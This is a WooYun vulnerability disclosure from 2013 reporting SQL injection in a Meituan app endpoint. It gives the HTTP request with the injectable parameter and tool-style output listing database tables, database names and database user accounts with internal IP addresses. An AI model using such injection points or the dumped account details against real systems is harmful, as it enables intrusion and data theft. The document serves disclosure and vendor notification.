当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045362

漏洞标题:APP终结者7#美团吃货App云端Sql注入影响主站多库

相关厂商:美团网

漏洞作者: zzR

提交时间:2013-12-09 10:12

修复时间:2014-01-23 10:13

公开时间:2014-01-23 10:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-09: 厂商已经确认,细节仅向厂商公开
2013-12-19: 细节向核心白帽子及相关领域专家公开
2013-12-29: 细节向普通白帽子公开
2014-01-08: 细节向实习白帽子公开
2014-01-23: 细节向公众公开

简要描述:

昨天晚上去吃了个火锅,媳妇儿说团购能便宜个20块钱,然后就美美的拿出了美团APP,然后我就趁机瞅了瞅,本来已经终结的App系列又回来了……

详细说明:

涉及美团APP:美团餐厅+美团外卖+……
请求如下

GET /woodpecker/poi/search?condition= HTTP/1.1
Host: xianfu.meituan.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
User-Agent: 美团餐厅 1.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: keep-alive
Cookie: 1=_from


condition=存在注入

漏洞证明:

当前user和db

1.png


当前库

Database: woodpecker
[52 tables]
+-----------------------+
| accesstoken           |
| activemq_info         |
| app                   |
| app_release_info      |
| banner                |
| canting_user          |
| customer_requirements |
| desk_class            |
| desk_order            |
| desk_order_window     |
| dining_table          |
| filter_user           |
| food                  |
| food_choose_feature   |
| food_feature_count    |
| food_material         |
| food_offer            |
| food_order            |
| food_practice         |
| food_practice_value   |
| food_relation         |
| food_set              |
| food_tag              |
| food_tag_value        |
| food_taste            |
| food_unit             |
| log_info              |
| meituan_outer_food    |
| meituan_outer_order   |
| meituan_outer_poi     |
| order_code            |
| order_offer           |
| ordered_food          |
| ordered_reward        |
| outer_system          |
| pad_info              |
| poi_env               |
| poi_info              |
| poi_member_stat       |
| poi_reward            |
| poi_score_rules       |
| printer               |
| return_food_reason    |
| score_event           |
| special_food          |
| statistics_trend      |
| tmp                   |
| tmp_order_code        |
| user_feedback         |
| user_loyalty          |
| wait_queue            |
| waiter                |
+-----------------------+


垮裤 美团餐厅

Database: xianfu
[36 tables]
+--------------------------+
| accesstoken              |
| activity_coupon          |
| card_manager_coupon_code |
| cardmanager_log          |
| channel                  |
| client_behaviour         |
| client_event             |
| client_register          |
| client_version           |
| coupon                   |
| coupon_account           |
| coupon_account_cookie    |
| coupon_batchsend         |
| coupon_channel           |
| coupon_code              |
| coupon_consume           |
| coupon_customer          |
| coupon_deal              |
| coupon_poi               |
| couponverify_log         |
| customer                 |
| customer_action_h        |
| customer_behaviour       |
| customer_demo            |
| customer_meituan         |
| customer_poi             |
| customer_relation        |
| customer_weixin          |
| customer_weixin_aptcha   |
| fastverify_log           |
| poi_sync                 |
| share_group              |
| share_group_c            |
| super_coupon_info        |
| super_coupon_login       |
| white_list               |
+--------------------------+
Database: xianfu
Table: coupon
[17 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| alertsms         | varchar(1024) |
| brandname        | varchar(255)  |
| content          | varchar(1024) |
| couponpic        | varchar(255)  |
| ctime            | int(11)       |
| duration         | int(4)        |
| etime            | int(11)       |
| event_expiretime | int(11)       |
| event_type       | int(5)        |
| id               | int(11)       |
| sms              | varchar(1024) |
| status           | int(3)        |
| stime            | int(11)       |
| title            | varchar(1024) |
| type             | int(2)        |
| utime            | int(11)       |
| warn             | int(11)       |
+------------------+---------------+


美团外卖库

Database: waimai
[25 tables]
+----------------------------+
| wm_address                 |
| wm_app_channel             |
| wm_app_version             |
| wm_channel                 |
| wm_discount                |
| wm_food                    |
| wm_food_import             |
| wm_food_tag                |
| wm_gao_poi_info            |
| wm_log                     |
| wm_order                   |
| wm_order_detail            |
| wm_order_detail_history    |
| wm_order_history           |
| wm_order_status_utimestamp |
| wm_poi                     |
| wm_poi_match               |
| wm_poi_tag                 |
| wm_poi_tag_dic             |
| wm_poi_utimestamp          |
| wm_push_client             |
| wm_tradearea_point         |
| wm_user                    |
| wm_user_dialogue           |
| wm_user_topic              |
+----------------------------+


各个字段什么名字我就不解释了吧
最后dbs

available databases [11]:
[*] biz_auth
[*] information_schema
[*] mysql
[*] pangolin
[*] performance_schema
[*] test
[*] test_waimai
[*] waimai
[*] woodpecker
[*] xfbase
[*] xianfu


看到这个pangolin 了嘛? 看看你们的内裤是不是还好好的
users 各种admin root

database management system users [183]:
[*] 'admin'@'10.64.10.104'
[*] 'admin'@'localhost'
[*] 'meituan_in'@'10.%'
[*] 'monitor'@'10.%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'skrepl'@'10.%'
[*] 'superadmin'@'10.64.10.104'
[*] 'xianfu_waimai'@'10.%'

修复方案:

已经给你们做宣传了,还想怎样哪-0-

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-12-09 10:28

厂商回复:

感谢对美团网的关注,正在处理。

最新状态:

暂无